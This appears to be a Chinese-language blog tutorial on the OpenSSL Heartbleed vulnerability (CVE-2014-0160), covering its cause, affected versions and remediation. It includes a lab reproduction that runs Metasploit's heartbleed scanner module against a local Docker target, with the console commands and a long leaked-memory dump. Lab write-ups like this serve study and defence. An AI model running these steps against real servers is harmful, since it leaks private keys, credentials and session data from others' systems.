OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解
OpenSSL(英语:Open Secure Sockets Layer。开放式安全套接层协议)在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。OpenSSL整个软件包大概可以分成三个主要的功能部分:SSL协议库、应用程序以及密码算法库。
文章共3,701字 · 阅读需要大约13分钟
一键AI生成摘要,助你高效阅读
问答
·
OpenSSL
OpenSSL简介
OpenSSL(英语:Open Secure Sockets Layer 。开放式安全套接层协议)在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。
OpenSSL整个软件包大概可以分成三个主要的功能部分:SSL协议库、应用程序以及密码算法库。作为一个基于密码学的安全开发包,OpenSSL提供的功能相当强大和全面,囊括了主要的密码算法、常用的密钥和证书封装管理功能以及SSL协议,并提供了丰富的应用程序供测试或其它目的使用。
Heartbleed
心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议。它于2012年被引入了软件中,2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查),因此漏洞的名称来源于“心跳”(heartbeat)。该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多。
漏洞描述
Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。
漏洞原理
Heartbleed漏洞之所以得名,是因为用于安全传输层协议(TLS)及数据包传输层安全协议(DTLS)的 Heartbeat扩展存在漏洞。Heartbeat扩展为TLS/DTLS提供了一种新的简便的连接保持方式,但由于OpenSSL 1.0.2-beta与OpenSSL 1.0.1在处理TLS heartbeat扩展时的边界错误,攻击者可以利用漏洞披露连接的客户端或服务器的存储器内容,导致攻击者不仅可以读取其中机密的加密数据,还能盗走用于加密的密钥。
影响版本
受影响的OpenSSL版本:
最后更新于2014年4月9日,据Heartbleed和OpenSSL网站上的信息。
受影响:
OpenSSL 1.0.2-beta
OpenSSL 1.0.1 - OpenSSL 1.0.1f
除非针对CVE-2014-0160的操作系统补丁已经安装,而没有更改库版本,如Debian、Red Hat Enterprise Linux(及其派生版,如CentOS、Amazon Linux)或Ubuntu(及其派生版,如Linux Mint)。
不受影响:
OpenSSL 1.0.2-beta2(将来版本)
OpenSSL 1.0.1g
OpenSSL 1.0.0(及1.0.0的分支版本)
OpenSSL 0.9.8(及0.9.8的分支版本)
要解决此漏洞,建议服务器管理员或使用1.0.1g版,或使用-DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL,从而禁用易受攻击的功能,直至可以更新服务器软件。
漏洞复现
环境介绍
靶机:centos7 192.168.0.66
攻击机:kali 192.168.0.128
确保两台测试机网络能通
1.在靶机上找到CVE-2014-0160,并进入,输入命令docker-compose up -d运行漏洞环境
ls #查看所有漏洞目录
进入openssl目录,打开漏洞环境CVE-2014-0160,运行漏洞环境
cd openssl
ls
cd CVE-2014-0160
docker-compose up-d
这里是我之前下载过的,所以docker-compose up-d 显示done
2.查看运行情况
docker ps #查看运行情况
复现过程
信息收集
1.使用Nmap进行扫描
2.使用Nmap漏洞扫描脚本对8443端口进行扫描检测如下:
使用MSF框架攻击
进入msfconsole
msfconsole
1.搜索相关漏洞模块
search heartbleed
2.扫描看是否存在heartbleed漏洞 ,之前我们用nmap扫描过的,8843端口处存在这个漏洞,这里在次进行漏洞验证。
use auxiliary/scanner/ssl/openssl_heartbleed
3.使用攻击模块1
use 1
4.查看配置参数
show options
5.配置参数
对required为yes但是current setting为空的项进行设置,这里我们只需要设置rhosts(靶机ip,即被攻击主机的ip地址)
set rhosts 192.168.0.66#靶机ip
修改漏洞需要利用的端口号
set rport 8443 #设置端口
设置verbose为true
set verbose true #设置verbose为true是为了 看到泄露的信息
6.进行攻击——run
run
这里就可以看到 靶机的64KB信息了(如果有人此时在登录web应用,还可以直接抓到账号密码等信息)。
```msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 192.168.0.66:8443 - Leaking heartbeat response #1
[*] 192.168.0.66:8443 - Sending Client Hello...
[*] 192.168.0.66:8443 - SSL record #1:
[*] 192.168.0.66:8443 - Type: 22
[*] 192.168.0.66:8443 - Version: 0x0301
[*] 192.168.0.66:8443 - Length: 86
[*] 192.168.0.66:8443 - Handshake #1:
[*] 192.168.0.66:8443 - Length: 82
[*] 192.168.0.66:8443 - Type: Server Hello (2)
[*] 192.168.0.66:8443 - Server Hello Version: 0x0301
[*] 192.168.0.66:8443 - Server Hello random data: 648c88db9180cea037bc9f92497834aadb7a77c12a8703c5562c9626b3242f88
[*] 192.168.0.66:8443 - Server Hello Session ID length: 32
[*] 192.168.0.66:8443 - Server Hello Session ID: 0f4d1f4385cfe1eae3dd2607deda20fcbba9d771880eb68fea4973a07a2f027e
[*] 192.168.0.66:8443 - SSL record #2:
[*] 192.168.0.66:8443 - Type: 22
[*] 192.168.0.66:8443 - Version: 0x0301
[*] 192.168.0.66:8443 - Length: 822
[*] 192.168.0.66:8443 - Handshake #1:
[*] 192.168.0.66:8443 - Length: 818
[*] 192.168.0.66:8443 - Type: Certificate Data (11)
[*] 192.168.0.66:8443 - Certificates length: 815
[*] 192.168.0.66:8443 - Data length: 818
[*] 192.168.0.66:8443 - Certificate #1:
[*] 192.168.0.66:8443 - Certificate #1: Length: 812
[*] 192.168.0.66:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x000055ea2e73cfd0>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.0.66:8443 - SSL record #3:
[*] 192.168.0.66:8443 - Type: 22
[*] 192.168.0.66:8443 - Version: 0x0301
[*] 192.168.0.66:8443 - Length: 331
[*] 192.168.0.66:8443 - Handshake #1:
[*] 192.168.0.66:8443 - Length: 327
[*] 192.168.0.66:8443 - Type: Server Key Exchange (12)
[*] 192.168.0.66:8443 - SSL record #4:
[*] 192.168.0.66:8443 - Type: 22
[*] 192.168.0.66:8443 - Version: 0x0301
[*] 192.168.0.66:8443 - Length: 4
[*] 192.168.0.66:8443 - Handshake #1:
[*] 192.168.0.66:8443 - Length: 0
[*] 192.168.0.66:8443 - Type: Server Hello Done (14)
[*] 192.168.0.66:8443 - Sending Heartbeat...
[*] 192.168.0.66:8443 - Heartbeat response, 65535 bytes
[+] 192.168.0.66:8443 - Heartbeat response with leak, 65535 bytes
[*] 192.168.0.66:8443 - Printable info leaked:
......d..@......<<...3......E..X..L..{..f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............0.................................................+............-.....3.&.$... .T"...<..f.TG>...[).!..r....y..W...~..............................................................................................................................dObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>.MT..A...m.zm..J..................................................................................................................................... repeated 15476 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.........................................................................................................................................................................................................................................................................................................................................`...\U......\U....................................................................................................................................................................................................................................................................Sy..{.......s.t.Gn.....D.....+..gL.]E..uh....L.V.n..t7.d..T&...q)W(.g..c.;.........V..>.....#ZJ........e.$...z.(.l%..R.dCT 9P...u.+)..!....i%.A...~S..JM._...e.r"..oA...rwQ..W..ymKc.N\.^FB.d.@..+..x..,Cv.f..|..{..........=..W..s....3................R....`........!...........\U..................!...........\U...r..\U..........!........o..\U......\U.. ...............d.d?.qo%.c..g^.......b..~~..-bNlF..\..39@]FO..N..Pv..._...7..F%...fY_...q|yL...+5........jsKz...'.b9..RG.*TuZ:...g...A....pg............................................................................................................................................!...........\U......\U..................p...\U......\U..........................................................................................................................................................................................................................................................!...................\U..qj.bI....Fx....a .$.|J..68......L..&.<8 .Z.E..2.^.?.cK.sU.@.f~.w`Iyi...,^.f.3.%P.Y..|..[.d.$.S.B.4.) HG.j.s;...<............u.4."....R..fD.M.....Ow.c.Y..J..B......0....V..D...i..l........ .G{.......c.$.?.Q.8.>a.b*.w....=..P.....^.....t/......;...8.................!...........\U......\U....................................................................................................................................................................................................................................................;...8.............................\U......\U........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I............................\U..................&..o.W.....$%....50..P....O.E../.a....^..<.I....~B2..[m.S9.b.5.....*...ZC..8.e.2..Y..C].S.....9..]y.#..7.~{.D..f.......7.........l.............a..l.!./u|.5.O..5...4.-....qw...%.B.R.....Ic...,*..6..`.b.mZ..P....(...`..@+...0....................x....."w.y{.p.0.[.#..2.S.....=......G..S............BG..S.~~...k~.V..{..\.n.t..p.D...f..t.H&.sP...&.'....!..lP3.z..R...6T.....,......v...ba..8.v$..c1....Fg.k..r.....6.|..m.......A...+.m..bo..ET.W>..`v...zW...s.....;.I).....$...FO...SN...rWL..-..5$..{...................-3..1c.mt&+..y...;.V.......!Vhn.'.&..^IBW...e..?......3..M....[.........)..?.w.\V.;....H.+.l7R..u..U..S.$.^4KV}d7<>.P...............u.4."....R..fD.M.....Ow.c.Y..J..B......0....V..D...i..l........ .G{.......c.$.?.Q.8.>a.b*.w....=..P.....^.....t/......;...8.................m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................q...............0...\U......!...............\U.............................................U..h7............................\U......\U........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................ /..\U......\U..........................................................................................................................................................................................................................................................................................................................................................................................................q...................\U......!...............\U................................................H1........................`...\U......\U..................................................................................................................................... repeated 248 times .....................................................................................................................................@...\U......\U....L...:#p.y..n......'O..F.....=.....N..w%......eu...BU>.O.....F'..G..........Y..o........Y.*#A.....F.uO.u(B..;..............................................\U..I.....x....r...)..m...V..Q.v....o..%...7..S...........R.p."..A....1... ^..P..b|....<.8.....E.^...6]V%.7..Obo...BF+B.................\U...........pi.....hmi......ui.....Pui......Xi......Wi......bi......ai......ai..... oi......Vi......`i.....(pi......li......si.....@si......Ri......Qi.....pni......ki.....xNi......pi......mi......ti.....Hti......Vi......Ui......ei.....(ei.....8\i......[i......ni.....Xki......Ti..... di......Zi......oi.....`li......ni......ji......Li.....hLi.....@Ri.....8Qi..... Ni......Qi......Pi......Mi......Mi......Li.........................................................\U..@...\U..........................................................1............ ...4i......u..\U......\U......\U............e......................!..........\U......\U..........c)..\U......................\U..........................................`...\U..........................................................................@...\U......{....y.D^....(.......................#..\U..........................................................@...\U...................r..\U............................Z..............................@......................................................................................................................................................................@...\U..................................................................................................................................................................................q...........\U......\U......................\U..................................................................Q.........D.......D.........\U......\U..HTTP/1.1 404 Not..................................................................................................................................... repeated 4090 times .....................................................................................................................................\U..jfx...&.P................|D......|D.....p...............................................................................................................................................................................................................................................`...............................................................................................................................................................................................................................................P...............0...\U......\U..............................\U..........H...\U..........@...\U..............................\U..y...........................\U..................A...\U..........172.22.0.1i.....`...\U...f..\U....................................................$.................\U..@...\U..@...\U..................@...\U..@...\U..........................................@...\U...........................................................................................ei.....1........|D......|D.............................q...................\U..........................................................................................a.......0...\U......\U..........................................................................1...........................................\U..1.......................................0.......A.........a..................... ...\U............T.............1........,..\U......\U..................0.......1........0..\U...|D.....................0.......0.......`...\U......\U..........................1........................................3..\U..1.......<....0.y..._...u.%bw+s.y.U7.v_......\U..1....................................... .......!...........\U..................!...........\U......\U....................................................................................................................................................................................................................................................;...8.............................\U......\U..........................................................................................................!........}D......}D......ui.....Pui......Xi......Wi......bi......ai......ai..... oi......Vi......`i.....(pi......li......si.....@si......Ri......Qi.....pni......ki.....xNi......pi......mi......ti.....Hti......Vi......Ui......ei.....(ei.....8\i......[i............................. ...................\U......\U..............................................................................................................................................................................................................................................\U..........................P...\U..............\U..............\U..............................\U..o...............i...\U..P...\U......................\U..........172.22.0.1......`...\U...f..\U....................................................$.....................@...\U..@...\U..................@...\U..@...\U..........................................@...\U..................................................@...........\U..................................................a...........\U.. ...\U..........A.......<....0.y..._...u.%bw+s.y.U7.v_....!.. ..4H....0.@.......!...............................!.......I...........\U..XU......!.........6.....jfx...&...~.....1.......Q%c.............................0.......A...........\U.. ...\U..................................@...............`...\U......\U......................................................................................................................................................................................................................\U...........~a.........\U......\U......................\U.................................. ...\U..................`o..\U..............................................\U......................\U......................s/.. ...\U......\U..................p...\U......\U...................................................................................................................................................................................................................................~a..... ...\U......\U......................\U......................................\U......................\U..........................................@...\U..................0r..\U..........................@...\U...!..\U....................D.......D..... ...\U.. ...\U..................Pr..\U...|D.........................\U..........P...\U..Pr..\U..................0.......0........r..\U..................................1.......P...\U...|D.............................0...........\U..................................A...........\U......\U.. ....... ....... ...\U..........`.......0........(..\U..\.....J.%.!......].%..q.........0.......p(..\U..............................................\U... ..\U......................\U..!...........\U......\U..P...................\U..@...\U......................\U......\U..............................\U.............................................................................................................................................................................................................................@.................................................................................................................................................................................................................................a...........\U...|D......................................................................................(..\U......\U..........................................................................................................................................................A...............................................................q...................\U...................................................................................................................................................................................................................................................................................................................................................................Fb.................................................\U...u..\U..................................................................0~D.....0~D......................................................................................................................................................................................................................vi.............@}D.....@}D.....hmi......pi......Wi......bi......ai......mi......pi......Ui......ei.....(ei.....8\i..........G.I|{.~3...1........|D.....`...\U..ps..\U...o..\U..........@...........\U..@...\U..................................................@%..\U......\U..................................................................................................................................... repeated 400 times .....................................................................................................................................a........~a..... ...\U..................p...\U..................P...\U..................................@s..\U.. }D.....................0.......0...........\U..................................1.......@s..\U...|D.....................................p...\U......\U..................................................................................................................................... repeated 572 times .....................................................................................................................................d.......7...Ix4..zw.*...V,.&.$/.d..@......<<...3......E..X..L..{............`)..\U..H.......................X@..............................h)..\U..h)..\U...........................................)..\U...)..\U..............................................................\U..........0...\U..................................................................................................................................... repeated 217 times .....................................................................................................................................pi.................\U...!......................................................................................................................................................................................................................................................1.......Q%c.............................0.......!........3..\U... ..\U.. ....... ...........\U......\U....................................................................................................................................................................................................................................................;...8.................!....... ...\U......\U......................................................................................................................................................................................................................................................................................\U......\U..................................................................................................................................... repeated 240 times .....................................................................................................................................!.......p...\U......\U....................................................................................................................................................................................................................................................;...8.................1...........\U..................................................Nj..\U..................0...\U..........p...\U......\U....a.......................a.......................a..................................................................... .a.............................................................1...................\U..................................................................................................................................... repeated 2472 times .....................................................................................................................................P...\U......\U..........................0...\U..............\U..............\U..............................\U..k.......................0...\U..................A...\U..........172.22.0.1128...`...\U...f..\U.................................................. .$.................\U..@...\U..@...\U..................@...\U..@...\U..........................................@...\U..............\U......\U..............................................\U......\U......\U......................................................................\U..@...\U..........................@...\U..............................\U..............................\U..................i...\U..@...\U......................\U..........192.168.0.128.......\U...f..\U....................................................$.........................\U..@...\U...................@..........\U..................$.......................@...\U..........................................................................................................................................................0z..\U......\U..f....m.b[-......0.......0...............................................1...........\U...|D.......................................D.......D.........\U......\U..0.......A...........\U......\U..........!.......@...\U..@...\U..p.......0........1..\U......\U....R..... .R..... .R.....Q...........\U..@...\U..........................!...........\U......\U...................................................................................................................................................................................................................................................................}D......'..\U..................................................................................................................................... repeated 200 times .....................................................................................................................................0...\U..`...\U..........................................................................1...........\U..P...\U....!.. ..4H....0.P.......0...........\U..................................A...........\U..P...\U..................0....... ...........\U..................q........}D......}D.....................0.......@...............................................@...\U..........0.......P...\U..\.....J.%.!......].%..q.........Q...........\U...|D.............................!........|D......1..\U..........P...........\U......\U..........................................................................................................................................................................................................................................................................................................................a...................\U..........................................................................1...........\U......\U..................0.......a........~a.....`...\U...................3..\U......................\U..........................Q...........\U......\U..................................................................................................................................................................................................................................................................................................................................P...\U......\U..........................................................................................................................................................................................................................1.......c O......5...L...h.......Iv..7..0.......1.......D.a........D1..Z.s&.%...#lN\..m.`.......1.......-j..Z..NIeQ.I..tr.........{(............1........|D.........\U..................0...............P...\U......\U........H8.d....6%0.......0...........\U..........................`.......0...........\U......\U..`...\U..@...\U..........1.......................................0.......a.......`...\U......\U..........................................................................Q...................\U..............................................................................................................................................................................................................................................................................................................................................\U..........................................................................................................................................................1.......................................0.......a...........\U......\U..........................................................................1...............................................1..........)b....0.x......!.. ..4H....0.0.......A...........\U..`...\U..p...\U......\U..................................P...\U......\U..........................................................................................................................................................!...........\U..0...\U.. ....... .......p...\U......................................\U..................................................................................................................................... repeated 400 times .....................................................................................................................................q........................................................................... ....M.C......&... ....q.....Is.z/.~....{....y.D^....(..............................................................................,..........d.............................-..\U.......................................................................................................................... !..\U......\U..................................................................................................................................... repeated 409 times .....................................................................................................................................}D......}D.......!.. ..4H....0.........1...........\U..`...\U..................`.......0...........\U....#Nb........C.;..^.S(.)........0.......p...\U..................................1...........\U..0...\U...%bw+s.y.U7.v_..................0 ..\U......\U..........................................................................................................
[*] 192.168.0.66:8443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) >
修复方案
OpenSSL“心脏出血”漏洞(CVE-2014-0160)受影响的OpenSSL版本:
OpenSSL 1.0.2-beta
OpenSSL 1.0.1 - OpenSSL 1.0.1f
要解决此漏洞,简单粗暴的方法就是升级openSSL软件。
建议服务器管理员或使用1.0.1g版,或使用-DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL,从而禁用易受攻击的功能,直至可以更新服务器软件。
1.将受影响的服务器下线,避免它继续泄露敏感信息。
2.停止旧版的 openssl 服务,升级 openssl 到新版本,并重新启动。
3.生成新密钥。(因为攻击者可能通过漏洞获取私钥。)将新密钥提交给你的CA,获得新的认证之后在服务器上安装新密钥。
4.服务器上线。
5.撤销旧认证。
6.撤销现有的会话cookies。
7.要求用户修改密码。
Heartbleed 是在 8 年多前被发现并修补的,然而许多服务器仍然存在 Heartbleed 漏洞
旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。
更多推荐
2
0- 0
已为社区贡献1条内容
所有评论(0)